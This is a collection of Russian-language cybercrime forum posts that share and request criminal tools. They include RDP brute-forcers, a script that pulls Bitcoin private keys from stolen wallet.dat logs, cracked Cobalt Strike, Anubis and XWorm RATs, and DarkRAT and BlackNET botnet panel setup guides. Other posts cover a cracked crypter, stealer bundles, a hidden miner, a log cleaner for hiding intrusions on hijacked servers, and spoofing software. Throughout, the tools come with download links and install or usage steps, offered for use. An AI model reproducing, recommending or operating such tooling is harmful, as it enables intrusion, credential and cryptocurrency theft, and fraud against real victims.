В общем добрые однофорумчане, отпишитесь по теме)
Подскажите пожалуйста софт для звонков на мобильные телефоны других стран с
подменой номера.....
Отблагодарю за инсайт)
Advanced tools for RDP cracking
Hidden content for authorized users.
NLBrute: https://anonfiles.com/R2a81a34o0/NLBrute_zip
KPortScan: https://anonfiles.com/b1b5163fob/KPortScan_zip
[/ hide]
У меня есть еще один, написанный мной. Дайте мне знать, если это желательно.
Все, что вам нужно сделать, это установить требования, поставить ключи API и
запустить основной файл.
You must have at least 10 reaction(s) to view the content.
Собственно недавно тут продавались эти исходники, взял их для изучения и решил поделиться с комьюнити
https://temp.sh/KbXHR/present.rar
Пароль местный
Чекер для массовой проверки всех приватных ключей из файлов wallet.dat
Все что я встречал в паблике или даже продаже тут у нас на форуме тупо искало
в wallet.dat файлах слова "name" и выдергивало оттуда рядом лежащий адрес.
Но это в корне не правильно. Ведь если например ваш стилер отработал в
понедельник, то в wallet.dat будет только 1 строка с адресом записанном в
адресной книге.
И если юзер в четверг решил перевести на этот wallet.dat биткоины то он нажмет
в BitcoinCore кнопку Create New Receiving Address и в wallet.dat будет записан
другой, новый адрес
о существовании которого паблик чекеры знать совсем не будут. А мой же скрипт
выдергивает все приватные ключи из файла wallet.dat и потом второй
дополнительный скрипт
генерирует на основе найденных приватных кючей биткоин адреса всех трех типов
для их удобной проверки на баланс.
Суть работы. Что бы вытащить все адреса и привкеи из всех файлов wallet.dat
нужно в файле wallet-parcer-v2.py
В строке SOURCE_DIR = '/home/pr1sm/LOGS/
Прописать путь до папки с логами.
Далее запустить
python wallet-parcer-v2.py
На выходе будут 2 файла.
hashes - для того что бы попытаться сбрутить (кто шарит тот поймет зачем) и
privkeys - файл с адресами legacy типа и приватными ключами.
После того как скрипт wallet-parcer-v2.py отработал берем файл privkeys и
переименовываем его в address.txt
Далее запускаем скрипт wif_to_address_v2.py он нужен что бы из всех приватных
ключей выдернутых с wallet.dat файлов вытащить адреса всех трех форматов. На
выходе будет 2 файла
out_address.txt - файл только с адресами (быстро чекнуть все адреса из этого
файла можно с помощью моего скрипта из этой темы
https://xss.is/threads/51535/)
и для удобства out_wif_address.txt (если будет адрес с балансом просто вбиваем
его в поиске по этому текстовику и быстро находим привкей от него).
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/GVpEBZaK#b65qyX2T5zxpKVI62PqS_HRvys068-UpX1EU5qeW904)
mega.nz
Пароль xss.is
Donate
Bitcoin bc1qphw8hltvwp6gqn6rx3rwgtuzxrcar6ap50rcqr
ETH 0x1C3136Ad67718Ebb6B235e159db761c5d657d0cf
del
You must have at least 1 reaction(s) to view the content.
Всем привет) Человек я тут новый, поэтому зайду в "хату" как положено))
Не так давно попало мне в руки сие чудо, разбираться времени небыло, бегло
посмотрел, нужно попыхтеть с установкой.
В общем качаем на здоровье, у кого будут какие мысли по установке, делитесь в
теме, чтоб софт приносил пользу.
Ах да, чуть не забыл, пасс как я понял тут принято ставить "местный")
Хайд, хоть и не большой но всёже поставлю.
ПыСЫ, также ищу человека который имеет понимание в Java/Android (для
понимающего делов на пол часа), надеюсь ктото откликнется...
You must have at least 30 reaction(s) to view the content.
Привет всем друзья
.
В просторах тележки в одном из каналов попался интересный архив с анубисом,
даже как заявил автор - их там 6 штук.
Сам не смотрел не ставил - думаю кому нужно разберетесь
.
Скачать :
You must have at least 5 reaction(s) to view the content.
del
Spoiler: Что нового:
November 6, 2020 - Cobalt Strike 4.2
----------------
+ Refactored Beacon Reflective Loader and added mechanism to patch rDLL
loader into
Beacon (vs. shipping a static loader with the agent).
+ Added stage -> allocator (VirtualAlloc, HeapAlloc, or MapViewOfFile) to set
which allocator Beacon's RDLL loader will use for the Beacon stage.
+ stage -> obfuscate now obfuscates .text section in rDLL package
+ Fixed client NPE triggered by missing download start metadata
+ Added Cobalt Strike client IP address to join message in events.log
+ Added -Dcobaltstrike.server_bindto=address (in teamserver script, java
command)
to change the address the team server will bind to. Default is 0.0.0.0.
+ Team server now uses a more resilient process to write its data model
+ Screenshot tool now reports user, session, and active window title.
+ Updated View -> Screenshots and other UX to use screenshot context info
+ Added color highlighting to View -> Screenshots
+ http-post C2 handler now detects another type of corruption.
+ Added color highlighting to View -> Downloads
+ Added color highlighting to View -> Keystrokes
+ Keystroke logger now reports user and session information
+ Updated View -> Keystrokes and other UX to use keylogger context info
+ Added option to "remove" screenshot or keystrokes from interface via menu
+ Added screenshots.log to logs/[date]/[target]/ folder with screenshot meta-
data
+ Stripped color codes from keystroke logs and added desktop session/user
context
+ Added Save option to keystroke and screenshot browser right-click menu.
+ Split screenshot into two commands: screenshot and screenwatch. screenshot
takes
a single screenshot. screenwatch takes periodic screenshots until terminated
with jobkill command.
+ Added printscreen command to take screenshot by forcing PrintScr keypress
and
grabbing contents from the keyboard.
+ Added post-ex -> thread_hint to spawn threads with specified
module!func+offset
start address. Affects the browserpivot, keylogger, net, portscan, and
powerpick/psinject post-ex DLLs.
+ Added post-ex -> keylogger to set keystroke logging method. Current options
are
SetWindowsHookEx and GetAsyncKeyState.
+ post-ex -> obfuscate now enables behavior to mask DLL strings, when not
needed,
in execute-assembly, keystroke logger, screenshot, and SSH client DLLs.
+ Added stage -> magic_mz_[arch] and magic_pe to set the MZ and PE header
values to
something else in Beacon's DLL package. Read the docs on this one as the MZ
values have to be valid executable instructions that [should] repair any
changes
+ Added a c2lint warning for operation-impacting high dns_ttl values.
+ HTTP and DNS C2 specific configs no longer show up outside of their
payloads
+ Beacon now detects http-post block request failures and tries requests
again.
+ Rewrote how DNS C2 caches and clears cache of conversations and entries.
This
fixes DNS C2 stability/performance for servers that send parent domain before
each FQDN request. It looked like a checkin to Beacon and was wreaking havoc.
+ Implemented remote-exec wmi as a BOF.
+ Max length of useragent field in Malleable C2 profile is now 255
characters.
+ Fixed bug with [possible] domain truncation in DNS/HTTP Beacon config if
the total
length of the specified domains exceeded 255 characters.
+ 8+ years in and I think y'all deserve some generosity from the Cobalt
Strike
product. As my kind act, I have doubled the max size of the http-get.client
and
http-post.client programs in your profile.
+ Added headers_remove global option to force Beacon's WinINet to remove
specified
headers late in the HTTP/S transaction process.
+ Added a "this goes into your config" notice to the HTTP Beacon proxy config
dialog
+ Added an empty BOF content sanity check to &beacon_inline_execute
+ Added rportfwd_local to create a port forward that initiates connection and
routes
from Beacon to team server onwards through the requester's Cobalt Strike
client.
+ Implemented spunnel and spunnel_local commands to spawn shellcode and
tunnel
connection to specified controller. spunnel_local forwards via Cobalt Strike
client
and spunnel forwards via the team server.
+ Added pivot socket read governor to limit read loop to max ~4s per Beacon
checkin.
+ Bug fixto link module read functions
+ Multiple improvements to existing rportfwd implementation.
+ rportfwd (and spunnel) are now friendly to having the rportfwd for a
session/port
redefined without the need to release the bound port and rebind it.
+ Pivot socket writes now happen on a connection specific thread to prevent
session
deadlock if the team server-side relayed connection becomes unresponsive or
blocked.
+ Fixed a handle leak in socks pivoting sub-system
+ DNS Beacon C2 now drops requests that are not A, AAAA, or TXT.
+ Added post-ex -> pipename Malleable C2 option to change post-ex job output
pipename
+ Added set ssh_pipename to set the named pipe used by Cobalt Strike's SSH
sessions
+ Proxy server config parser now strips trailing / (which impacted the port
value).
+ Any # in Malleable C2 pipename options is now replaced with a random hex
digit.
+ Fixed BeaconUseToken BOF API to return a BOOL as documented
+ Added BeaconSpawnTemporaryProcess BOF API.
+ Fixed parser to extract creds from dcsync [domain] output
+ Made changes to avoid unneeded VirtualProtect when startrwx/userwx in
process-inject
block are both true.
+ BOF executable memory now honors startrwx/userwx hints from process-inject
block
+ Added script hook to enable use of alt. mimikatz, provided by us, between
releases
+ Updated to Mimikatz 2.2.0-20200918-fix
+ Greatly reduced the size of mimikatz-min and mimikatz-chrome DLLs.
+ Added chromedump alias to run dpapi::chrome in mimikatz.
+ Improved recoverability of parent Beacon if a child TCP Beacon process
"fails"
+ Added Vista+ check to getsystem in Beacon console.
+ Browser Pivot HTTP Proxy is now manageable via View -> Proxy Pivots
+ Added &bmimikatz_small to Aggressor Script.
+ Moved capability to query network interfaces to a BOF and out of core
Beacon
+ Added some ptr cleanup to post-ex RDLL loaders.
+ Fixed SSH agent bug where session was sometimes incorrectly reported as
elevated
+ Added set data_jitter "X" to add noise to Beacon's HTTP/S beaconing by
adding
up to X (random each time) random bytes to the output of each http-get and
http-post response
+ c2lint warns for a bad process-inject -> execute config for Windows XP-era
systems.
+ execute-assembly now stomps DOS header when post-ex -> obfuscate is true
+ Added c2lint check for dangerous headers to overwrite with http-config.
Лицензия: cracked
](https://anonfiles.com/71q29c43p3/Cobalt_Strike_4.2_zip)
anonfiles.com
Пофиксил все критичные баги которые нашёл
1. краш при добавлении базы с кирилицой
2. краш при сохр. остатка
Сменил api чекера
Сохранение капчи в отдельный файл или вечный перебрут (пока не будет :
гуд/бед/лок)
Добавление своего списка UserAgent
Hidden VNC
Download:
You must have at least 15 reaction(s) to view the content.
Update
v2.9.1
-Исправили чек Netflix (новый дизайн сайта), также теперь обязателен чек с
прокси, так как банит ІР.
-Добавили в чек Twitter домен х.сom, теперь чекает оба домена.
-Исправили отправку уведомления об окончании работы с результатами в Telegram через бота.
-Исправили 5 слот для кастомных проектов.
-Другие мелкие исправления.
Update
v2.9.1.
-Fixed Netflix check (new site design), also now check with proxy is
mandatory, because bans ІР.
-Added x.com domain to Twitter check, now checks both domains.
-Corrected sending notification about the end of work with results to Telegram via bot.
-Fixed the 5th slot for custom projects.
-Other minor fixes.
Просьба креатору софта пофикси ебан#й yahoo | Please ask the software creator to fix the fucking yahoo.
Click to expand...
You must have at least 5 reaction(s) to view the content.
Teper Free
Na konkurs opozdal nu pust buset prosto
tak
Donaty privetstvuyutsa)
Budu rad novym narabotkam, u samogo poka net vozmoznosty investirovat v
proect.
Download:
Hidden content for authorized users.
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/bf6102215da3fc18/#nCpQ2Av55P8yaBzuzJbXcw)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
Pass: mestniy
Thanks:
Hidden content for authorized users.
bc1qnkz8x45pdmnt3gr0xafgjlefqts83ykanmzrmq
You must have at least 50 reaction(s) to view the content.
Xworm V 5.6 Cracked
Download HERE :
Code:Copy to clipboard
https://t.me/mrxhacking1/22254
Zaxvat (Захват) - это инструмент командной строки, написанный на Go,
предназначенный для захвата доменов / субдоменов.
GIT: https://github.com/grozdniyandy/zaxvat
Эта программа написана на языке программирования Go. Он использует стандартную библиотеку для различных операций.
Значит если вы знакомы с захватом доменов / субдоменов, то вы должны знать что в основном это работает через запись CNAME - для тех кто не знакомы, скоро выйдет статья на эту тему. Так вот этот скрипт проверяет, является ли CNAME домена уязвимым для захвата или нет.
Статья: https://xss.is/threads/102073/
Я хочу напомнить вам, что данное программное обеспечение предназначено только для легального использования.
https://thehackernews.com/2019/04/subdomain-microsoft-azure.html - яркий пример с новостей. Да, я напишу что через наш софт это легко, но не только. Например тут был захват субдомена - https://hackerone.com/reports/202767 - эта была уязвимость сервиса которую потом исправили, наш скрипт т.к. каждый раз берёт данные с уже обновлённого списка, не пологаясь на старый, будет показывать что этот сервис в списке имеется, но не уязвим. Как в скриншоте выше. Также вы сможете прочитать "Discussion" в котором люди которые сталкивались с этим сервисом обсуждают то что уязвим он или нет и пишут свой опыт. Вы можете спросить а зачем показывать субдомены которые не уязвимы? Как в примере с hackerone, возможно вы найдёте уязвимость в самом сервисе, так что лучше знать.
Можете прочитать домены с файла и поставить 100 потоков например:
Code:Copy to clipboard
cat domains.txt | xargs -P100 -I {} ./zaxvat {} > takeover1
А потом чекайте файл
Code:Copy to clipboard
cat takeover1 | grep -A4 matches
https://github.com/grozdniyandy/zaxvat
Релизы внизу, пользуйтесь на здоровье (скачиваете и всё) , но особо советую компилировать самому. Если дефендер кричать будет, я не при чем
ссылка: вот
пароль: titanstealergovno
всё что есть в архиве
Криптовалютный сканер, оформленный под бота в ТГ. Создан для арбитража крипты,
показывает какую прибыль получить, где купить, где продать. Уже можно
зарабатывать, в будущем будут обновления. (Открытый/закрытый деп, адрес смарта
и т.п.)
Не продаю код, продаю доступ к сие боту. Пример уведомлений прикрепляю ниже.
Связаться со мной можно в тг - @bardssss
Hidden content for authorized users.
You must have at least 100 message(s) to view the content.
Работает через IMAP
Чекает на валид и входящие письма (по адресу) , позже добавлю чек по телу
сообщения и вложениям (но это не точно)
You must have at least 15 reaction(s) to view the content.
ВирусТотал https://www.virustotal.com/gui/file...57e09f0f663bd4720c2b7e11f4d81bfb0b2?nocache=1
Нашел не плохую сборку разного хаЦкерского софта на андроид
СКАЧАТЬ
You must have at least 8 reaction(s) to view the content.
ищу софт для подмены майла
Софт является "приватным" и стоит 150$/месяц.Более того, это даже не криптор,
это обычный лоадер, напичканный бекдорами от автора(был бекдор в самом софте и
в конечном билде; все вырезал).Со слов автора софт умеет обходить Windows
Defender, ничего подобного я не нашел.
Spoiler: Продажник(Скрин софта)
Скачать можно тут:
https://anonfiles.com/r9xcEc38u6/CyberCrypter_Cracked_lamp-ret.fun_zip
Спасибо OWL за предоставление лицензионного билдера
IDA v6.17.2.1. Правда был слитый 7. Но мб кому-нить пригодится)
[CLIKE][/CLIKE]
](https://anonfiles.com/R1Y3Y0i6n0/IDAP_v6.17.2.1_Portable_rar)
anonfiles.com
Holla!
New release of sweet Burpsuite PRO is public now for activating Burpsuite [2022.3.7](https://portswigger.net/burp/releases/professional- community-2022-3-7) .
To start you should use java9+ , To activate open the loader.
Code:Copy to clipboard
java -jar Loader.jar
and open the burpsuite
Code:Copy to clipboard
java -javaagent:BurpSuiteLoader_v2022.7.jar -noverify -jar burpsuite_pro_v2022.7.jar
copy the activate code and paste in the field, then click in MANUAL activate, and follow pictures.
then
last
Click next now and enjoy!
Download.
](https://anonfiles.com/P5xaE0xbye/burpsuite_v2022.7_7z)
anonfiles.com
We ask all members on XSS to vote for3 participates in Конкурс статей
#7 !
Yes this way you say thank you for for XSS community!
DarkRAT is one of many remote access tools (RATs) used to control connected computers remotely. Unfortunately, in many cases, cyber criminals trick people into installing RATs onto their systems and then use them to steal personal details, infect systems with malware, and cause other damage.
Darkrat is designed as a HTTP loader, it is coded in C++ with no dependency, the Current bot is design for the Windows API! this means, DarkRat has no Cross Platform Support.
Click to expand...
Connect to your Server via SSH Install Apache2, PHP7.x MYSQL (MariaDB Server in Ubuntu 18) and PHPMYADMIN Enable .htaccess from apache2 configurations. Create .htaccess file in your root directory and write inside:
<Directory /var/www/html> Options FollowSymLinks AllowOverride all Require all granted </Directory>
Unpack the DarkRat.zip Upload Files to the root of your www (By Default /var/www/html/) on a new Installation delete the index.html Give www Write/Read/Execute permission on all uploaded files (chmod 777 ./*) open your domain oder serverip / Now you see the install page Flowing the Setup and install the Panel, or install it Manual by import the sql by default enter username: admin password: admin
Config Example:
<?php $pdo = new PDO('mysql:host=localhost;dbname=darkrat', 'username', 'password');
Create a License file named darkrat.lic and enter your License Key. Create a file named config.json and enter your Gate Settings. Shortnames: ek = Encryption Key (Lenght 32) and pu = Pastebin URL OR Direct Encrypted URL
{ "pu": "keRwrh9WFcNrWnCLM96VuBRRMCYg/UPgRTb09A==" }
Full Config Example
{ "ek": "randomkey", "pu": "http://XXX.com/raw/random", "mux": "3mCUq1z", "sup": "false", "ri": "5", "pre": "false", "st": "main", "ua": "SUq1rx", "pn": { "FOO":"BAR" } }
Open the builder.exe and enter your username Select create from Config File if you created one, if not select create from Terminal. Finished. spider.exe is created, Backtest your payload on a VM.
You must have at least 25 message(s) to view the content.
Отвязанная сиб панель версии 9.1, на форуме не нашел.
You must have at least 20 reaction(s) to view the content.
Я ищу, LokiBot 2.1 (Не стиллер) Кто может поделиться им? Помогу вам чем смогу.
P.S Не надо писать что он не актуальный, но мне он очень нужен.
Нашел у себя на облаке , может кому-то будет интересно посмотреть код!
Download:
[CLIKE]
](https://anonfile.com/DaLd27Can4/Cronos_PRO_5.0.11003_rar)
anonfile.com
[/CLIKE]
GeoIP byGuron - софт для чека IP из текстового файла.
Особенности
+Использует offline базу maxmind
от
05.12.2018
+Использует offline базу [blocklist-
ipsets](https://anonym.freehacks.ru/?https://github.com/firehol/blocklist-
ipsets)
+Парсит IP по регулярке, что позволяет грузить список IP в любом формате.
+Сортировка по любым параметрам.
-Требует .NET Framework 4.0 (написан на c#)
Как использовать
https://imgur.com/a/NR61mE4
Сохранение результатов
https://i.imgur.com/K2kDQQr.gifv
(Либо выделить нужное и ctrl+c, ctrl+v)
Скачать:
Hidden content for authorized users.
https://yadi.sk/d/n55LLY08uzQHwA
Честно говоря я хз для чего его можно использовать и как. Сделал потому-что
могу... Если есть идеи, что добавить пишите в тему.
З.ы. Если есть поновее база, либо Enterprize буду рад если скинете в ЛС.
Моральная поддержка:https://qiwi.me/guronbomj
Бесплатный smtp чекер для корп почт. Работает без проксей
Жду ваших отзывов и предложений
https://dropmefiles.com/oZjqU
Стиллеры не новые,но может быть,новичкам пригодится.Честно стырил с соседнего
форума.Автор сборки указан в текстовом документе.На клей и прочее не
проверял,открывать на виртуалке!!
https://dropmefiles.com/yDPh5
Размер после распаковки 700+ метров.Пароль местный.
Если баян,пожалуйста,удалите.
Слив с соседнего форума. Отписывайте по стабильности работы.
Склеек на проверке замечено не было.
You must have at least 10 reaction(s) to view the content.
Все функции скрытия процесса были удалены
Если будешь использовать MinerGate то подключается лучше по IP: порту, пример: 136.243.102.167: 45700, проблема в том что если конектится на домене xmr.pool.minergate.com, некоторые AV срабатывают
Необходимо зарегистрировать ocx для работы майнера:
Scan at the moment:
https://www.virustotal.com/gui/file...82641cc281e28706d0fbd9faf96a858e5d8/detection
Download: <https://mega.nz/#!d1R0XKCa!IEt3TB8mVlB55fbPuUUt5bVfAcF-
xewc__Tg9RHVFlg>
Pass: 7331YEFROM
Всем привет. Вот и пришла пора порадовать вас очередной нужной и полезной в
нашей жизни программой - xDedic Log Cleaner.
Надеюсь вам известно что дедики ведут логи, полные и подробные. Пишется точное
время когда вы залогинились на дедик, пишется имя вашего компьютера ( Вася-ПК,
Коля-ПК и им подобные, пишется ип адрес с которого вы логинитесь на дедик,
установка\удаление, изменение настроек... в общем почти все!
И если админ дедика не дурак - он посмотрев логи сможет отследить каждый ваш
шаг на дедике. Палевно, правда?!
Мы потратили очень много времени на написание данной программы, которая на
первый взгляд кажется очень простой.
xDedic Log Cleaner предназначен для очистки логов системы, очистки временных
папок типа temp, также можно удалить акаунт с дедика вместе со всеми фалами
которые вы насоздавали во время пользования. Очистка производится не от имени
вашего акаунта, а от имени системы (System).
Внимание, очень важно: Программа работает ТОЛЬКО на серверах с админ
правами!!! OS: Windows Vista и выше.
Описание кнопок:
[ Flush ] - очистка логов в один клик. Дальше объяснять нет смысла, и так
понятно!
[ Auto Flush ] - очистка логов в заданный промежуток времени, т.е.
выбрали время, нажали ок и все, программу можно закрыть, очистка логов будет
каждые %N минут.
**[Flush &LogOFF] **- чистим логи и логофаемся с акаунта. Полезно если вы не
создавали себе учетку на дедике, а рабоатете под купленным акком, тоесть вы
отключились от дедика, а запись того что вы отключились осталась в логах, ее
надо стереть. Закончили работу с дедом - выбрали опцию, задали время, нажали
ок, отключились от дедика. Программа сама заметет следы и логофнет учетку.
[AccountDelete] - Полезная и в то же время опасная функция. Полезность:
Известный баг: на домашних ос иногда не отображает размер удаленной информации, т.е. остаются нули. Но логи всеравно чистятся
Скачать / Пароль: exploit.in
BlackNET
Бесплатный ботнет с интерфейсом PHP с использованием заглушки и компоновщика
на основе VB.NET
О BlackNET
BlackNET - это простой ботнет с панелью PHP и выходом VB.NET. Автор:
DarkSoftwareCo
Что ты можешь сделать
Как установить панель PHP
Скачать BlackNET - PHP Panel.zip
Загрузите ZIP-файл на ваш сервер
Извлеки это
Перейти к PHPMyAdmin
Создайте базу данных с любым именем
Изменить данные в config.php
Измените разрешение для файлов и папок blacknet на 777
Перейдите в db.php для автоматического создания таблиц ботнетов.
Зайдите на сайт register.php и создайте новый аккаунт.
Войдите в свою сеть и наслаждайтесь взломом
Code:Copy to clipboard
https://github.com/BlackHacker511/BlackNET
Проект для 2click.us
[CLIKE]
файлообменник, для обмена фото, видео файлов и других документов. ](http://wdfiles.ru/ePuS)
Файлообменник, без ожидания скачивания и капчи, загрузить файл с высокой скоростью. Превью изображений, медиафайлов, видео, документов и архивов. Лучший файлообменник без регистрации и ограничения скорости. Облако для обмена файлами, Файлообменник фотографий, передача фото ВК, получение...
wdfiles.ru
[/CLIKE]
Много говнокода. Писал давно. Просьба не осуждать. Во благо орды.
Hidden content for authorized users.
тык
пароль: d22asf2dkt383nsnx
Acunetix Web Vulnerability Scanner Version 13 (build 13.0.200326097 – Windows)
Кракнутая, но полностью безопасная версия Acunetix Web Vulnerability Scanner
v13 от китайских реверсеров.
Версия v13 (build 13.0.200326097 – Windows and Linux) - 26 Марта 2020
New Features
Introduced support for processing of Swagger 2.0 files during scans
Introduced support for Swagger 2.0 files as import files
New Quarterly scheduled scan option
New Vulnerability Checks
New check for Weak key used to sign cookie in Play framework
JavaScript Library Audit now supports TinyMCE
New check for BigIP iRule command injection
New check for XSS in .NET session in URL
New check for Remote Code Execution (RCE) in Ruby on Rails (CVE-2019-5420)
New Check for Oracle E-Business Suite Deserialisation RCE
New Check for Oracle E-Business Suite SSRF (CVE-2017-10246)
New Check for Oracle E-Business Suite SSRF (CVE-2018-3167)
New Check for Oracle E-Business Suite SQL Injection (CVE-2017-3549)
New checks for WordPress Core and plugins, Joomla and Drupal
Updates
Minor UI updates
Better reporting of scans interrupted due to network errors
Client Certificate address can now be configured for a Target
HTTP Authentication address can now be configured for a Target
Abort Scan after 25 network errors
Implemented Proof of Exploit for Blind SQL Injection vulnerabilities
Improved showing Scan Duration for long scans
Fixes
Fixed: On Reports page, Target address shows as N/A for Targets that do not
have a Description
Fixed issue uploading import files larger than 1mb
Fixed issue whereby some addresses had missing a character in the report
Fixed false positive in Possible server path disclosure
Fixed issue causing the scanner to not following multiple redirects
Fixed 2 scanner crashes
Multiple fixes in WADL parser
Fixed: Case Sensitive Paths settings was sometimes not being taken into
consideration
Fixed issue in Possible Sensitive Directories identifying incorrect locations
Fixed issue for users with expired passwords not given the option to change
their password
patch.dat
Code:Copy to clipboard
文件大小: 9.05 MB (9,495,554 字节)
修改时间: 2020年02月15日,19:12:02
MD5: DF55133FEBC38C61C44C587258010847
SHA1: 36E08745CE320B93942A3B3E56A4A0731B08F292
SHA256: C5FE43596FFE6CB5C97071BF82B62D3D71CAA67F275AEE3B425E4AB6B8E3948A
SHA512: 27263DE9BCAA611FBC174DDE51A8E91D5EA9948CC489D5835786AD61BAC260D188BBD556082A8B85C770928693FD5638C3B4AB9280B6FED643310E2D9DBEAFBC
CRC32: F98F05F9
计算时间: 0.06s
patch.exe
Code:Copy to clipboard
文件大小: 6.00 MB (6,301,696 字节)
修改时间: 2020年03月28日,19:55:49
MD5: 5A58C1B4C6839E3FA4DFAE903E90D7E2
SHA1: 916D8A63713A36BC232013947C6E49B8D4442389
SHA256: 8C07AE7DAC26AE8419D6CDC0F27EFAB56D83CBEF5EFBFF37D22AB8823D1C573C
SHA512: E2FE6E7283DF84B2A84A78938E7E728CB654FCFF3F89F82BFD9CCA18D71E2FC6199D13712B52B918598DA2D527A252C30DAD5AAB27227438EBE3E58798ADDEBD
CRC32: 9F614E29
计算时间: 0.03s
acunetix_13.0.200326097.exe
Code:Copy to clipboard
文件大小: 112 MB (117,840,072 字节)
文件版本: 0.0.0.0
修改时间: 2020年04月01日,11:20:20
MD5: 3D2D94F1210DE4CA62C605905644CA9E
SHA1: 0D423731D4F3B12541F532B7A1031DB1DE9250F4
SHA256: 4E6FED34269FA5E46C6F0D36CFF375800D48ED854BA4B072DF35EDCB8E310264
SHA512: 862F3089088EB0B6E71C9D27D597DC1930C0397757340B7D49A3651FA5B79665D7353DCFE09454B25229DA6185E318747427D2A86ED5F90FC2F0288D80F1111A
CRC32: A3733C72
计算时间: 0.53s
Spoiler: Скриншоты
Скачать
You must spend at least 5 day(s) on the forum to view the content.
Уважаемые форумчани - поделитесь последний версий или посоветуйте чем еще
просканить свои сервисы на уязвимости
только живые и полноценные решения
Подскажите, кто каким чекером пользуется для чека карт на валид ( в идеале и на баланс), что б не убивало после чека.
Azorult Parser
язык: python
ридми:
Simple azorult parser coded by bluemagic, to run program, on linux place
script in same folder as azorult logs .zip file and run, command line from the
same directory.
You must have at least 5 message(s) to view the content.
Парсер логов Azor
В папку Logs кидаете папки с логами,не сжатыми,чисто папками.
В Links пишите ключевые слова или линки.
В папке Result создаст ярлыки на папки где есть эти ссылки или слова .
Автор не я,взято с другого борда как есть.
:excl: Скачать
чек на вирустотале https://www.virustotal.com/ru/file/a6380fd4...sis/1536362021/
Acunetix 13 для Linux
Vulnerability scanners ensure web application security by securing your website and web applications against hacker attacks
![www.acunetix.com](/proxy.php?image=https%3A%2F%2Fwww.acunetix.com%2Fwp- content%2Fthemes%2Facunetix%2Fico%2Fchrome-touch- icon-196x196.png&hash=30a0fb203c3dbd0416c5555a5f4433b4&return_error=1) www.acunetix.com
Ставил на Ubuntu 16. Пашет отлично. Есть еще дистриб под Windows, но нет кряка.
Поддерживаемые ОС:
- Ubuntu Desktop/Server 16.0.4 LTS or higher
- Suse Linux Enterprise Server 15
- openSUSE Leap 15.0 and 15.1
- Kali Linux versions 2019.1 and 2020.1
- CentOS 8 Server and Workstation (with SELinux disabled)
- RedHat 8 (with SELinux disabled)
Тут описаны заивисимости:
System requirements and how to install Acunetix web vulnerability scanner.
![www.acunetix.com](/proxy.php?image=https%3A%2F%2Fwww.acunetix.com%2Fwp- content%2Fthemes%2Facunetix%2Fico%2Fchrome-touch- icon-196x196.png&hash=30a0fb203c3dbd0416c5555a5f4433b4&return_error=1) www.acunetix.com
Ubuntu Server:
sudo apt-get install libxdamage1 libgtk-3-0 libasound2 libnss3 libxss1 libx11-xcb1
Suse Linux Enterprise Server or OpenSUSE Leap:
sudo zypper install libXdamage1 libgtk-3-0 libasound2 mozilla-nss libX11-xcb1 libXss1
Red Hat Enterprise Linux:
sudo yum update
sudo yum install libX11 libX11-devel gtk3 nss libXScrnSaver alsa-lib bzip2
Установка:
1. chmod +x acunetix_13.0.200217097_x64.sh; ./acunetix_13.0.200217097_x64.sh
2. Скопировать Crack/wvsc в "/home/acunetix/.acunetix/v_200217097/scanner/" и
перезаписать оригинальный файл
3. Скопировать Crack/license_info.json в
"/home/acunetix/.acunetix/data/license/" и перезаписать оригинальный файл
4. Ребутнуть (ну или передернуть сервис)
5. Зайти по адресу https://ip:3443
Hidden content for authorized users.
You must have at least 20 reaction(s) to view the content.
ДИСКЛЕЙМЕР: взято все у китайцев, если ли там закладки я хз, сеть не мониторил. Поэтому ставьте все на виртуалки, на свой старх и риск.
На github был архив. Сейчас пропал из паблика.
У кого-то остался?
На днях наткнулся на Гитхабе на забавную программку, точнее питонг скрипт+есть скомпиленный ЕХЕ, его суть доставать пароли с разных программ, браузеров, Wi- Fi. В консоли сеть несколько ключей, включая дамп пассов в файл.
![](/proxy.php?image=https%3A%2F%2Fuser- images.githubusercontent.com%2F10668373%2F43320585-3e34c124-91a9-11e8-9ebc-d8eabafd8ac5.png&hash=bcea558f0fc3ca8ce2eb6813700d9c39)
список поддерживаемого https://prnt.sc/lbwy20
Тестил на Вынь 10 х64 - все что было из паролей, включая последнюю лису - все
достал без проблем.
Macro_pack - это инструмент, используемый для автоматизации обфускации и
генерации ретро-форматов, таких как документы MS Office или VBS-подобные
форматы. Теперь он также обрабатывает различные форматы ярлыков.
Этот инструмент можно использовать для повторного анализа, пентестов,
демонстраций и оценки социальной инженерии. macro_pack упростит обход
антивирусных решений и автоматизирует процесс от генерации vba до генерации
окончательного документа Office.
Это очень просто использовать:
Инструмент совместим с полезными нагрузками, генерируемыми популярными
инструментами пентестов (Metasploit, Empire, ...). Это также легко
комбинировать с другими инструментами, так как можно считывать ввод из
стандартного ввода и спокойно выводить данные в другой инструмент. Этот
инструмент написан на Python3 и работает на платформе Linux и Windows.
github
Spoiler: 3 у вас 39
- бесплатный
- исходники
- брутит дедики, на которых установлена ОС Windows
- сканер настроен на случайные IP на порт 3389
- для брута используется протокол NTLM+
- не имеет внешних зависимостей и работает на нативном протоколе - тем самым
достигается высокая скорость работы
- использует многопроцессорность и многопоточность
- можно использовать как отдельно файл с логинами, паролями и логин-паролями
- кроссплатформенный
- имеет минимальные брут листы
тыц
1. Отформатировал код
2. Добавлен прогресс (что делает, сколько осталось, гуды и беды)
3. Тащит список серверов с файла
тыц
Ставите на любой бесплатный хост эту "штучку" и пишете от любого имени и от любой почты будь-то @vk.com или же @steamcommunity.com
You must spend at least 6 day(s) on the forum to view the content.
[akalankauk/2018-Fake-Mail-Sender](https://github.com/akalankauk/2018-Fake- Mail-Sender)
BruteDum - это инструмент для брутфорса SSH, FTP, Telnet, PostgreSQL, RDP, VNC с Hydra, Medusa и Ncrack. BruteDum может работать с любыми дистрибутивами Linux, при наличии Python 3.
Установка:
Arch:
Code:Copy to clipboard
sudo pacman -S nmap hydra medusa ncrack
Debian:
Code:Copy to clipboard
sudo apt install nmap hydra medusa ncrack
Code:Copy to clipboard
git clone https://github.com/GitHackTools/BruteDum
cd BruteDum
python3 brutedum.py
Забираем тут:
FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack ](https://github.com/GitHackTools/BruteDum)
